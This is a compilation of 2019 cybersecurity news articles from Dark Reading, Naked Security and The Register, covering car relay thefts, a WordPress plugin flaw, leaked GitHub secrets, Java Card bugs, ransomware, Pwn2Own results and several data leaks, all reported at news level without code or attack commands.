STE WILLIAMS

In voting conducted by the SANS Institute, Jackson Higgins is named by peers as one of the top 10 journalists in the industry.

Dark Reading executive editor Kelly Jackson Higgins has been named a Top 10 Cybersecurity Journalist in voting conducted by the SANS Institute earlier this month.

The 10 award winners were selected from a field of more than 100 journalists through a multistep nomination and voting process among active journalists. The awards recognize the full body of work contributed by each journalist during 2018. Dark Reading staff editor Kelly Sheridan was also a nominee.

Jackson Higgins won the Top Ten award the last two times the SANS Institute conducted the voting, in 2014 and 2012.

A veteran of more than two decades of IT journalism, Jackson Higgins has worked for Dark Reading since its inaugural year in 2006. Prior, she covered a variety of IT technologies and published articles in publications such as Network Computing, Secure Enterprise Magazine, and CommunicationsWeek.

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/dark-readings-kelly-jackson-higgins-honored-as-top-cybersecurity-journalist/d/d-id/1334238?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Execs and employees have dramatically different ideas of how much information is being lost and why – a gap that puts enterprise data in grave danger.

Management and employees have dramatically different views of how risky employee behavior can be. According to the results of a new security survey released today, that gap puts enterprise data in grave danger.

The survey, conducted by Opinion Matters and sponsored by Egress, includes the views of more than 250 IT leaders and more than 2,000 employees from the US and UK. It found more than three-quarters of the executives believe employees have accidentally put company data at risk in the past year. When employees answered the same question, 92% said they had not done anything to put data at risk.

When it comes to intentional breaches, the division is no less stark. Sixty-one percent of IT leaders said employees have maliciously put company data at risk, while 91% of employees said they’ve done no such thing. This kind of divide – in which employees are unaware of, or unwilling to admit their roles in, data loss – poses a particular challenge to IT leaders trying to educated their employees about good security practices.

There is more information within the data. For example, more than half (55%) of employees who admitted breaking company rules to share data said their organizations don’t provide the tools required to securely share sensitive information. In addition, 29% of employees said they believe they have some form of ownership over data they have worked on as part of their jobs. This echoes another finding, that 20% of those who intentionally shared data did so because they felt that the information was theirs to share.

Read more here.

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/insider-threats/it-leaders-employees-divided-on-data-security/d/d-id/1334241?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Do you dislike the idea of standing in an empty driveway that should be occupied by your car, obediently waiting to unlock after you chirp-chirp your keyfob at it?

If so, you might want to take a gander at the security ratings for new cars put out by Thatcham Research, a nonprofit insurer research center in the UK.

Thatcham rated 11 cars that were launched so far in 2019 and plans to continue to assess new cars for security. It rated six of those 11 cars as being poor for security.

Specifically, it’s looking at those wireless keys: matchbox-sized fobs that have proven woefully susceptible to what’s known as relay attacks.

That’s when thieves use two relay devices that are capable of receiving, and extending, wireless signals from the car through walls, doors and windows, to reach the fob inside a car owner’s house. The relay devices are cheap to pick up online.

Standing next to the car, they just have to scan for signals transmitted by the wireless keys and then amplify them to open the cars, hop in and drive off.

Is your car a wireless sitting duck?

When the German General Automobile Club (ADAC) tested 237 keyless cars from 30 brands in January this year, it found that nearly all of them – 230 – are vulnerable to relay attack.

In the ADAC’s research, the only cars that could fully resist a keyless hacker attack come from Jaguar Land Rover: the Jaguar I-Pace, as well as the latest versions of the Land Rover Discovery and Range Rover Evoque. Four other cars could be either unlocked or started, and all remaining 230 vehicles were vulnerable to all kinds of hacker attacks.

For its part, Thatcham got good results from the Audi E-tron, Jaguar XE, Range Rover Evoque and Mercedes-Benz B-Class: cars with wireless fobs that resist the attacks by either using more secure wireless technology or by going to sleep when they haven’t been used for a set time.

Thatcham Research chief technical officer Richard Billyeald told WhatCar? that Thatcham focused on relay attacks because they’re so good at blowing past whatever car manufacturers have done to boost security:

We’re focusing on keyless theft in particular because it gives thieves the ability to bypass 20 years of security improvements in a matter of seconds.

Precisely, that would be about 60 to 90 seconds, as we’ve seen in recent car thefts.

From zero to “poof!” in 60-90 seconds

CCTV footage of a relay attack captured in the UK in December 2017 shows one of the thieves standing near the victim’s property, waving a relay device until he gets a signal from a key fob inside the house or garage. The other thief stood near the car with his own relay box, which receives the signal from the relay box near the property. The car sniffs the unlock-me signal that’s close by, and it obligingly unlocks the door.

That one took about 60 seconds. This past November, the rip-off of a Volvo from a London couple took around 90 seconds, as we know from the CCTV footage captured after the poor people had a camera installed… which they did following the same exact thing happening to the same type of car a year before.

Not everybody’s a fan of the ratings

WhatCar? reports that the Society of Motor Manufacturers and Traders (SMMT) isn’t a big fan of Thatcham’s new ratings. It quoted CEO Mike Hawes, who seems to think that security via obscurity is a better approach:

It confuses rather than simplifies a very complex issue and will not help consumers, rather offering a signpost to thieves and increasing the risk of targeted criminal activity.

Hawes defended the auto industry’s work on this:

New cars are more secure than ever, and the latest technology has helped bring down theft dramatically with, on average, less than 0.3% of the cars on our roads stolen.

Criminals will always look for new ways to steal cars; it’s an ongoing battle and why manufacturers continue to invest billions in ever more sophisticated security features.

That’s good to hear. Still, if it were me staring at the empty driveway where I left my second new Volvo the night before, I’d be quite interested in hearing which car brands have come up with ways to thwart relay attacks.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MY05ThVYZAI/

Two hacking groups have been spotted targeting websites running unpatched versions of the WordPress plugin Easy WP SMTP.

Easy WP for SMTP, which has more than 300,000 installs, is marketed as a plugin that lets WordPress sites route their bulk emails via a reputable SMTP server as a way of ensuring they aren’t spamholed by suspicious email providers.

Unfortunately, version 1.3.9 is vulnerable to a security flaw that allows attackers to set up ordinary subscriber accounts with hidden admin powers or hijack sites to serve malicious redirects.

According to WordPress firewall developer Defiant (formerly WordFence), the problem lies with the Import/Export functionality added to 1.3.9:

The new code resides in the plugin’s admin_init hook, which executes in wp-admin/ scripts like admin-ajax.php and admin-post.php.

This does not check the user capability, which means any logged-in user, including a subscriber, could trigger it.

It’s not clear from the plugin changelog how long 1.3.9 has been in use but a second firewall company, Ninja Technologies, said it first picked up attacks exploiting the weakness “since at least March 15.”

One campaign appears to be exploiting the vulnerability to grab admin privileges, while a second the second sends visitors to malicious sites before…

Injecting malicious script tags into all PHP files on the affected site with the string “index” present in their name. This obviously affects files named index.php, but also happens to impact files like class-link-reindex-post-service.php, present in Yoast’s SEO plugin.

How widely exploited is this flaw?

The last dozen or so comments on plug-in’s support are from users who claim their sites were targeted. Although these can’t be verified, one of those claimed to have lost “10 client sites in 3 days.”

What to do

What admins do next depends on whether they believe their site has been targeted or not.

Defiant offers a long list of possible indicators of compromise (IoCs) in its blog but if you see none of these then first change the WordPress and SMTP passwords before applying the update to version 1.3.9.1 as an urgent priority.

If you think your site might have been targeted, the recommended action is to first reinstate it from a pre-hack backup before applying the update and changing those passwords.

If no backup is available, the plugin’s developers offer instructions for manually cleaning a site before turning on automatic or scheduled backups as a future defence.

Last week it was users of the Abandoned Cart for WooCommerce plugin who were being urged to update as soon as possible. The moral of these stories is that diligent updating of plugins has become an important part of securing any site.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/FgOGdk1Gh3M/

Researchers have found that one of the most popular source code repositories in the world is still housing thousands of publicly accessible encryption keys.

Over 100,000 code repositories on source code management site GitHub contain secret access keys that can give attackers privileged access to those repositories (repos) or to online service providers’ services.

Researchers at North Carolina State University (NCSU) scanned almost 13% of GitHub’s public repositories over nearly six months. In a paper revealing the findings, they said:

We find that not only is secret leakage pervasive – affecting over 100,000 repositories – but that thousands of new, unique secrets are leaked every day.

The credentials that developers routinely publish on their GitHub repos fall into several categories. These include SSH keys, which are digital certificates that automatically unlock online resources. Another is application programming interface (API) keys (also known as tokens). These are digital keys that enable developers to access online services ranging from Twitter to Google Search directly from their programs. The researchers found a mixture of these keys for services including Google, Twitter, Amazon Web Services, Facebook, MailChimp, online telephony service Twilio, and credit card processing companies Stripe, Square, and Braintree.

These leaks sometimes compromised high-value targets. The researchers found Amazon Web Service (AWS) credentials for a large website serving millions of US college applicants. They also found AWS credentials for the website of a major government agency in a Western European country.

How does it happen?

Developers sometimes get careless when updating the code on their machines and then sending it to GitHub, which they typically do using command line instructions known as commits and pushes.

Coders will sometimes store SSH keys and API keys in the same directories as their source code, so that they get caught up in the commit and push process. It’s an easy mistake to make with SSH keys, which developers often generate from the command line. Some other mishaps are even more facepalm-worthy, such as embedding API keys directly in source code.

One way of preventing private keys from being committed is to tell a .gitignore file where they are. This is a file that blocks certain information from being uploaded to a GitHub repo. Instead, some developers stored their secrets directly in the .gitignore file, meaning that it got included in their repos.

Some online services like OAuth require multiple secrets for access, such as a digital key and an ID. That didn’t provide much extra security in this case though, because four in five of the repos holding these secrets contained the other information required to access the third-party service as well.

Many developers did nothing when notified of the problem, according to the paper. Those that tried to fix the problem tended to create new commits for their repos that removed the secrets. This doesn’t work, because GitHub is a version control system and stores information held in past commits.

What devs really need to do is either rewrite their history to remove the offending commit, or delete the entire repo and start again without storing the password, said the researchers. Most people did neither.

How did the researchers find these keys? Was it via some nefarious hack or loophole in the website? Nope – they just searched for it. GitHub has a search API that can be used to search across all its repos, and it happily delivers the secret key data.

Paper co-author Brad Reaves told us:

While we used the Search API, which requires an API key that can be obtained for free by any GitHub user, keys can also be found with the online search function.

This has been a problem since at least 2013, when GitHub shut down its search service for a while after finding secret keys turning up in searches. He added:

After this was publicized, GitHub took down the Code Search tool, claiming unrelated reasons, but shortly relaunched the tool with the same functionality.

So is all of this GitHub’s fault? Hardly. As Reaves pointed out:

Code search is a great tool, but it would be very difficult for GitHub to build a tool that censored all possible secrets; the burden is on developers not to post secrets to public repositories.

To its credit GitHub, which Microsoft acquired for $7.5bn in October 2018, is trying to make things better. It introduced rate limits for its search tool, although the paper points out that an attacker could overcome this by searching through multiple accounts. It has also been scanning repositories for several years to find GitHub OAuth tokens and personal access tokens, which can be used to access peoples’ GitHub repositories.

In October 2018, GitHub also announced partnerships with third-party online services as part of a new feature called Token Scanning. This scans new commits or private-turned-public repos for service providers’ API keys and notifies the appropriate service provider when it finds them. That service provider may then choose to revoke the credentials, which is the step GitHub recommends, according to a spokesperson there. She also told us that it has shared information on more than 100 million compromised tokens so far.

It’s a start, said Reaves, but GitHub’s work can only solve the problem up to a point:

I think efforts like GitHub’s Token Scanning project should be applauded, but they are only effective once a leak has already occurred. This problem also is likely not isolated to GitHub – it will affect any publicly available code. We need more research to develop systems that help developers avoid this mistake in the first place.

Kudos to GitHub for trying its best to solve the problem, but it’s up to developers to use services like this – and the associated tools like Git – properly.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xe2CEbq_Sx0/

Lasers could be used to detect radioactive material secretly transported to and from ports one day, according to a group of physicists from the University of Maryland in the US.

The boffins describe a proof-of-concept method that can sniff out the particles emitted from radioactive decay using a technique known as an “electron avalanche”. The process is a little complicated and contains multiple steps.

It begins with shining an infrared laser beam near a radioactive source. Radioactive material like uranium and thorium decays over time by ejecting alpha particles from its nucleus. The alpha particles can ionise nearby air molecules by robbing them of their electrons. The researchers call these free electrons “seed electrons” are they quickly attach themselves to nearby oxygen molecules.

Here’s where the laser comes in. An infrared laser can ionise those seed electrons weakly attached to the oxygen molecules. The energy from the laser accelerates these electrons and they go on to collide with other molecules in the air, ionising them to create an avalanche of free electrons.

“A simple view of avalanche is that after one collision, you have two electrons,” said Howard Milchberg, co-author of the paper published this month in Science Advances and a professor of physics and electrical and computer engineering at the University of Maryland (UMD). “Then, this happens again and you have four. Then the whole thing cascades until you have full ionization, where all atoms in the system have at least one electron removed.”

Now, the air in the laser’s path is ionised and affects the photons in the laser beam. Some of these photons are reflected and backscattered from colliding with the ionised air molecules to reach a silicon photodiode detector. The spectrum of the backscattered light is processed using software to reveal details about the density of the seed electrons, which in turn determines the level of radioactivity.

Visited the Grand Canyon since 2000? You’ll have great photos – and maybe a teensy bit of unwanted radiation

READ MORE

“If there is no radioactivity, there are no seed electrons so no avalanche breakdown occurs,” Robert Schwartz, first author of the paper and a physics graduate from UMD, explained The Register. “When you introduce a radioactive source there are seed electrons so we can see the breakdown. It is a very sensitive technique. Sources as weak as 1 microgram of Cobalt-60 produces detectable levels of air ionization.”

At the moment the technique has only measured radioactive material from distances of up to one meter away, so it’s not really much of an improvement over current methods like using a Geiger counter yet.

But Schwartz reckoned that scaling up the process could increase that distance to ten meters or even 100 meters if a stronger laser pulse was used. “The benefit of our method is that it is inherently a remote process. With further development, it could detect radioactive material inside a box from the length of a football field.”

He believed that such a system could be fitted inside a van maybe in ten years’ time or so. “Anywhere you can park a truck, you can deploy such a system. This would provide a very powerful tool to monitor activity at ports.” ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/25/geiger_counter_lasers/

Roundup This week we got freaked out about heart implant hacks, welcomed a new Microsoft security tool, and endured yet another Facebook fsck up.

Here’s what else happened along the way:

Slack pack give keys a whack

Large enterprise customers will now have more control over the security of their Slack channels.

This after the workplace chat giant announced it would let companies bring their own security keys into their Slack channels. The feature, called Enterprise Key Management, works through AWS, letting businesses push their keys to AWS key management system then use them with their own Slack installations.

“What actually makes the design of our system so unique is that, in the case of an incident let’s say, rather than revoking access to the entire product, admins can choose to revoke access in a very granular, highly targeted manner,” said Slack CSO Geoff Belknapp.

“That granular revocation ensures that teams continue working while admins suss out any risks.”

Scare in Texas over hacked sirens

Earlier this month, residents in two Texas towns were awoken at 0230 when storm sirens suddenly went off. According to Dallas-area TV station CBS-DFW, authorities are convinced the late-night wailing was the work of hackers.

The station cites officials in the cities of DeSoto and Lancaster who report that an unknown person(s) were somehow able to get into the city’s network and trigger storm sirens across the two cities. This, in turn, prompted officials to shut down the emergency siren system for several days while the matter was sorted.

“Based on the widespread impact to the outdoor sirens located in two separate cities, including Lancaster, it has become evident that a person or persons with hostile intent deliberately targeted our combined outdoor warning siren network,” Lancaster city hall said.

“Sabotage against a public warning system is more than vandalism.”

Metal workers in deep sheet following data breach

A California division of the Sheet Metal Workers Union is sending out warnings to its members following the disclosure of a data breach related to equipment theft.

Local 104 told (PDF) the state Attorney General’s office that on February 5 one of its administrators had their car broken into.

Among the items stolen from the vehicle were a backpack, laptop, and a flash drive containing the names, driver’s license numbers, and social security numbers for members of the local union.

As a result, the union now says it will offer those who were exposed the standard two-year enrollment in a credit monitoring service. It is recommended that anyone who gets a notification letter from the union should keep a close eye on their bank statements and seriously consider enrolling in the monitoring service.

Spyware linked to journalist’s killing in Mexico

A journalist in Mexico suspected to have been murdered by a local drug cartel was also the subject of a targeted spyware campaign.

Citizen Lab reports that in the week after the killing of Javier Valdez, attempts were made to infect the phones of two of Valdez’ former colleagues, as well as his widow, Griselda Triana, with spyware. Researchers eventually linked the malware to an ongoing attempt by a government-connected group to monitor journalists with tools developed by the NSO Group.

“The spyware, developed by Israeli company NSO Group, is designed to infect and remotely monitor mobile phones,” the report notes.

“In that investigation, we linked the infection attempts to a group that we call RECKLESS-1, which we linked to the Mexican government.”

Pick a type of fraud: Chances are one of these two blokes engaged in it

Two US men have been convicted of carrying out a remarkable range of online and real-world fraud schemes.

The DOJ has announced guilty verdicts against two men who were found to have engaged in a series of scams ranging from dating to email compromise and even sham marriages.

Olufolajimi Abegunde and Javier Luis Ramos-Alonso were found to have engaged in, among other things, dating site “catfishing” scams where people were tricked into sending cash, money mule scams where marks were told to cash out stolen funds and send wire transfers, and even business email compromise attacks where funds were drained from companies.

Abegunde was also said to have helped launder the stolen cash through black market currency trades and helped support the whole thing by keeping two separate marriages.

“Abegunde was married during his studies at Texas AM, but divorced his wife in 2016 to marry a US service member through whom he could obtain immigration and health care benefits and also open new bank accounts,” the DOJ said.

“He continued to live with his first wife in Atlanta while his US service member wife was deployed to South Korea.”

Trolls target veterans groups

In case you wondered how social media could get any more toxic and miserable, the US government is now worried that troll groups are targeting American veterans.

Rep Ted Lieu (D-CA) is calling on the FBI to open an investigation into suspected organized troll campaigns focusing on manipulates both vets’ groups and those still serving in uniform.

The congressman says the troll farms are creating fake veterans’ groups, then using the bogus profiles to manipulate vets and service members much in the same way political groups did in the run-up to the 2016 election.

Meet the new VPN, same as the old VPN

Users looking to get a new VPN could be in for a shock when they find their old and new service are run by the same company.

A report from reviews site VPNPro shared with The Register examined 97 popular VPN products and found that all were the work of just 23 companies. In most instances, developers maintained multiple VPN apps.

Why is this a big deal? VPNPro researchers note that with so much consolidation, users have far less choice than they think, and by hiding the owners of an app the chances of being exposed to surveillance increase dramatically.

“If they are in Russia, China, and other authoritarian/repressive governments, they are forced to provide their data to the governments on a default basis,” the report notes.

“The parent company may also be willing to sell user data.”

Norsk Hydro bouncing back from ransomware attack

When last we left Norsk Hydro, the industrial and electric giant had disconnected much of its network in order to contain a ransomware attack.

A few days later, and things are looking up for the company. A news update reports that most of Norsk’s business units have resumed normal activity, and staff have entered the forensics portion of the event, with Microsoft coming in to help investigators.

“There have been no reported safety incidents as a result of the cyber attack, and most operations are running, ensuring deliveries to customers according to specification, with some more manual operations than normal,” Norsk said.

“The attack has been reported to Norway’s National Investigation Service (Kripos) and the police have opened an investigation. Although progressing from day to day, it is still not clear how long it might take to restore stable IT operations.”

Meanwhile, chemicals manufacturers Hexion and Momentive both also appear to have been ransacked this month by the same, or similar, file-scrambling nasty as the one that hit Norsk Hydro. It is speculated this ransomware is LockerGaga.

Pwn2Own wraps up

The CanSecWest conference is winding down, and we now have a list of the winners from this year’s Pwn2Own contest.

The event pits researchers against a series of fully patched PCs, browsers, mobile devices, and even cars, with the goal being to compromise and hijack the gear via previously unknown vulnerabilities. The first person(s) to show a working full zero-day exploit for the target devices, and thus achieve typically remote code execution, get to take home big cash prizes.

Below are some of this year’s big winners, as well as their payouts, after successfully hacking the following products:

• Apple Safari: Amat Cama and Richard Zhu. $55,000.
• Oracle VirtualBox: Amat Cama and Richard Zhu. $35,000.
• Oracle VirtualBox: Phạm Hồng Phi. $35,000.
• Oracle VirtualBox: Amat Cama and Richard Zhu. $35,000.
• VMWare Workstation: Amat Cama and Richard Zhu. $70,000.
• Apple Safari: Niklas Baumstark, qwertyoruiop, Bruno Keith. $45,000.
• Mozilla Firefox: Amat Cama and Richard Zhu. $50,000.
• Microsoft Edge on VMWare Workstation: Amat Cama and Richard Zhu. $130,000.
• Mozilla Firefox: Niklas Baumstark. $40,000.
• Microsoft Edge: Arthur Gerkis. $50,000.
• Tesla Model 3: Amat Cama and Richard Zhu. $35,000.

Congrats to all the winners. The vendors involved have been privately informed of the flaws so they can be patched before anyone else finds them. Standby for patches to arrive when developed. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/24/security_roundup_220319/

Facebook has just admitted to years of problems with password hygiene by leaking plaintext passwords into logfiles by mistake.

Watch this special edition of Naked Security Live…

…we answer the questions lots of people have been asking us since we first wrote about this issue:

• What happened?
• Was this a blunder or was Facebook being deliberately sneaky?
• Should I close my account because of this?
• Is this issue connected to Facebook’s recent outage?
• What steps should I take right now?

(Watch directly on YouTube if the video won’t play here.)

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/gQmdjFRPDSo/

Bug hunters say Oracle’s Java Card platform is host to a dozen and a half security flaws that could place smart-cards and similar embedded devices using the tech at risk of hijacking.

Adam Gowdiak, CEO of Security Explorations, said he and his team discovered and privately reported the vulnerabilities to Oracle and smart-card hardware biz Gemalto. Neither vendor has responded to a request for comment on possible updates.

Designed for things like SIM cards, payment cards, and other embedded tech, Java Card lets snippets of code, dubbed applets, run within a small memory footprint on cards and similar gadgets using the minimal processing power available in the widgets.

How I hacked SIM cards with a single text – and the networks DON’T CARE

READ MORE

These applets can perform authentication checks, cryptography, and other sensitive operations within the cards, using things like secret keys stashed on the devices without having to disclose them. Oracle estimates around six billion pieces of kit use the Java Card operating system in some way, shape or form.

In an advisory describing the bugs, Gowdiak explained that the 18 different security issues found by his team would potentially open the door for everything from security bypasses to complete takeover of the gizmos. In order to exploit the flaws, a malicious applet has to be loaded into the card, perhaps by a compromised or dodgy card reader, and due to a lack of internal protections, this injected software nasty can then potentially take over the card or cause other mischief.

The bugs were verified to exist on the most current version of Java Card 3.1.

“There are ways for malformed applications loaded into a vulnerable Java Card to easily break memory safety,” Gowdiak explained. “Such a breach directly leads to the security compromise of a Java Card VM, applet firewall breach and jeopardizes security of co-existing applications.”

He went on:

Unfortunately, due to certain architectural choices from the past, it’s hard to perceive Java Card technology in terms of security … In some cases, whole card environment can be compromised, but that’s dependant on the underlying OS / processor architecture (i.e. presence of the flat address space, isolation between tasks).

It should be emphasized that successful loading of a malicious applet into target card requires either knowledge of the keys or existence of some other means facilitating it (a vulnerability in card OS, installed applications, exposed interfaces, etc.). Such scenarios cannot be excluded though.

Gemalto is involved in the disclosure because one of the findings specifically impacts its GemXplore 3G V3.0-256K and 3G USIMERA Prime SIM card models.

While the vulnerabilities do pose a security risk, to realistically pull this off, you need to know firmware is running on the target card, and its architecture. That’s not impossible to find out, of course. The vulnerabilities could provide the first step an attacker would need to perform a larger intrusion into a building or some other system. Given the high-value areas, such as finance and telecoms, where Java Card operates, such bugs could prove highly valuable should they not be properly patched.

Should a fix for the vulnerabilities come from Oracle, the most likely release date would be April 16, when Big Red’s next quarterly patch dump is scheduled. In other words, no, we’re not aware of any fixes available yet. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/22/oracles_java_card/

Disaster relief org FEMA has admitted, conveniently on a Friday night, to accidentally leaking banking details and other personal information of 2.3 million hurricane and wildfire survivors.

The US government’s Federal Emergency Management Agency picked the end-of-the-week bad-news dump time slot to let the public know that one of its contractors had mistakenly been sent more information than it ever needed to know.

“In transferring disaster survivor information to a contractor, FEMA provided more information than was necessary,” is how the agency’s press secretary Lizzie Litzow put it today.

“Since discovery of this issue, FEMA has taken aggressive measures to correct this error. FEMA is no longer sharing unnecessary data with the contractor and has conducted a detailed review of the contractor’s information system.”

The extra personal info handed over to the contractor is said to have included 20 data fields including things like bank transit and electronic funds routing numbers.

Insult to injury: Malware menace soaks water-logged utility ravaged by Hurricane Florence

READ MORE

The 2.3 million people exposed by the privacy screw-up are said to be survivors of the California wildfires, and Hurricanes Harvey, Irma, and Maria, all in 2017. If there is a bright side, so far it looks like the information did not get out into the public space.

“To date, FEMA has found no indicators to suggest survivor data has been compromised,” Litzow said.

“FEMA has also worked with the contractor to remove the unnecessary data from the system and updated its contract to ensure compliance with Department of Homeland Security (DHS) cybersecurity and information-sharing standards.”

The agency says that it has already begun working with the unnamed contractor to get the leaked information wiped off its systems, and plans to provide its employees with additional training so that the incident doesn’t happen again.

“As an added measure, FEMA instructed contracted staff to complete additional DHS [Department of Homeland Security] privacy training,” Litzow added. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/23/fema_data_loss/